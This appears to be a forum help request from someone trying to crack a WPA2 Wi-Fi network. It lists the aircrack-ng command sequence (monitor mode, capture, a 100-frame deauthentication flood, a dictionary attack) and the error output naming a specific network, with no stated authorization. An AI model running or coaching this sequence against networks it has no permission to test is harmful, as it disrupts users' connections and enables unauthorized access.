I try to hack WPA2 wifi so this is what i do:
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng --bssid (bssid) -c (channel) --write wpa2 wlan0mon
aireplay-ng --deauth 100 -a (bssid) wlan0mon
but when i try the aircrack-ng wpa2.cap -w passlist.txt
it does`t work and this is the error:
Opening WPA2-01.cap Read 12126 packets.
# BSSID ESSID Encryption
1 BC:F6:85:DE:2A:A5 Dr.laban No data - WEP or WPA
Choosing first network as target.
Opening WPA2-01.cap Got no data packets from target network!
Quitting aircrack-ng...
i also try service network-manager stop
and airmon-ng check kill
but it does`t work.